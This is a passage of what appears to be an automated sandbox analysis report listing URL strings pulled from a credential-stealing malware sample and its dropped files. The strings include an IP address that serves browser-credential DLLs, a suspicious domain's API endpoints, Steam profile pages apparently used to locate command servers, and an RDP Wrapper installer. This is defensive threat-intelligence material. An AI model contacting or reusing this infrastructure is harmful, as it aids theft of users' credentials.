Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, nss3.dll.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, nss3.dll.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052446912.0000000002DB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052446912.0000000002DB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RDPWInst.exe, 00000016.00000000.2818017493.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, RDPWInst.exe.15.dr	String found in binary or memory: http://stascorp.com/load/1-1-0-62
Source: BKJKEBGDHD.exe, 0000000F.00000002.3052610087.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://stascorp.comDVarFileInfo$
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: RDPWInst.exe, 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.15.dr	String found in binary or memory: http://www.apache.org/licenses/
Source: RDPWInst.exe, 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.15.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2898107037.0000000020AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, nss3.dll.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr, BGDGHJEHJJ.exe.3.dr, GIJEGDAKEH.exe.3.dr, 66f5db9e54794_vfkagks[1].exe.3.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2909837228.0000000026A3C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.2895438057.000000002059D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2858662976.000000001A5FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://5.75.211.162
Source: RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162.exe
Source: RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/
Source: RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/0_
Source: RegAsm.exe, 0000000E.00000002.3294389274.00000000016A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/1g
Source: RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/;_
Source: RegAsm.exe, 0000000E.00000002.3294389274.00000000016A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/B
Source: RegAsm.exe, 0000000E.00000002.3294389274.00000000016A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/C
Source: RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/F_
Source: RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/I_
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/freebl3.dll2
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/freebl3.dllb
Source: RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/k
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/msvcp140.dllh
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001555000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/nss3.dll
Source: RegAsm.exe, 0000000E.00000002.3294389274.00000000016A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/o
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/softokn3.dll
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001555000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dll
Source: RegAsm.exe, 00000003.00000002.2843926018.00000000015C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/vcruntime140.dll
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001598000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/vcruntime140.dllv
Source: RegAsm.exe, 0000000E.00000002.3291876197.0000000000584000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162Data
Source: RegAsm.exe, 0000000E.00000002.3291876197.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162GIJDH
Source: RegAsm.exe, 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162KKFCG
Source: RegAsm.exe, 0000000E.00000002.3291876197.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162h;
Source: CFBAKK.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 76561199780418869[1].htm.3.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 0000000B.00000002.2877988854.0000000001242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/
Source: RegAsm.exe, 0000000B.00000002.2876092064.000000000121E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/O
Source: RegAsm.exe, 0000000B.00000002.2877988854.0000000001242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/api
Source: RegAsm.exe, 0000000B.00000002.2877988854.0000000001242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/apiii
Source: RegAsm.exe, 0000000B.00000002.2877988854.0000000001242000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/apik
Source: RegAsm.exe, 0000000B.00000002.2877988854.0000000001237000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site:443/apiprofiles/76561199724331900
Source: RegAsm.exe, 00000003.00000002.2843926018.000000000163F000.00000004.00000020.00020000.00000000.sdmp, IJKFII.3.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: RegAsm.exe, 00000003.00000002.2843926018.000000000163F000.00000004.00000020.00020000.00000000.sdmp, IJKFII.3.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: CFBAKK.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: CFBAKK.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: CFBAKK.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 0000000E.00000002.3291876197.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2877988854.0000000001296000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2882185687.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000003.00000002.2843926018.0000000001573000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3291876197.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.3294389274.00000000016CD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
